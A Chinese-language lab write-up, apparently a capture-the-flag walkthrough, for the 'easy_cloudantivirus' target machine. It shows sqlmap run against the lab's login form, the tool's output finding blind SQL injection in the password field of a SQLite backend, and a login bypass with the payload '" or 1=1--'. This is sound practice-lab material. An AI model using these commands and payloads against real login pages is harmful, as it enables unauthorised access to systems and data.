- 首页 > 生活 > >
靶机: easy_cloudantivirus( 二 )
表单提交指向 /login 网页,我们可以大致推理出,这个表单提交的数据是用于登录此处可以尝试进行注入测试在网站这发现网页内容中查找可能的注入点,我们可以使用 sqlmap 进行测试
- 新建一个文件 target.txt
- 使用 Kali 的 Firefox-ESR 在页面
http://192.168.56.109:8080/ 使用 Ctrl + Shift + I 打开 Web 开发者工具 - Web 开发者工具中的网络工具对页面
http://192.168.56.109:8080/login 设置拦截 - 在页面
http://192.168.56.109:8080/ 发送上面表单的 POST 请求 - 复制拦截的该请求的请求头和请求数据到 target.txt 文件中
- 使用命令
sqlmap -r target.txt -f --level 4 --risk 3
┌──(kali?kali)-[~/workspace]└─$ sqlmap -r testsql.txt -f --level 4 --risk 3_____H_____ ___[']_____ ___ ___{1.6.10#stable}|_ -| . [(]| .'| . ||___|_[(]_|_|_|__,|_||_|V...|_|https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 15:18:43 /2022-10-23/[15:18:43] [INFO] parsing HTTP request from 'testsql.txt'[15:18:43] [INFO] testing connection to the target URL[15:18:44] [INFO] testing if the target URL content is stable[15:18:44] [INFO] target URL content is stable[15:18:44] [INFO] testing if POST parameter 'password' is dynamic[15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic[15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable[15:18:45] [INFO] testing for SQL injection on POST parameter 'password'[15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y[15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable[15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Yfor the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y[15:19:14] [INFO] testing 'Generic inline queries'[15:19:14] [INFO] testing 'SQLite inline queries'[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'[15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'[15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'[15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable[15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found- 从中可以看出存在注入点,并且 DBMS 可能是 SQLite
- 并且从
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable 可以看出注入类型 OR boolean-based
构造 SQL 注入语句,已知注入类型 OR boolean-based 可以尝试比较通用的语句 " or 1=1--做为页面 http://192.168.56.109:8080/ 中表单的 password 值进行提交表单
到目前为止,我们成功登录
http://192.168.56.109:8080/scan
经验总结扩展阅读
-
-
-
老阿姨|女孩子有这“3脸型”,请放过“刘海儿”,否则当心被叫“老阿姨”
-
-
|喜欢吃的菜,第二天餐桌上一定有,有一种幸福叫婆婆宠!
-
2023仪器类热门专业有哪些 就业前景比较好的专业
-
-
-
-
-
|儿女结婚之前,准亲家见面,要做到“两问、两不问”
-
-
-
2022年农历九月初一举办成人仪式吉日 2022年9月26日是举办成人仪式的黄道吉日吗
-
-
一辈子是一件太漫长的事情|愿意为你做这6件事的男人,值得你爱他一辈子!
-
也许是幼年时期的我们 也许真心爱过的我们,被失去的情感伤过。不敢继续爱了
-
-
中国不容错过的这几个适合旅游的好地方 中国旅游景点推荐
-
硫磺硫磺皂每天用来洗脸,“皮肤”会有什么变化,看完你就懂了
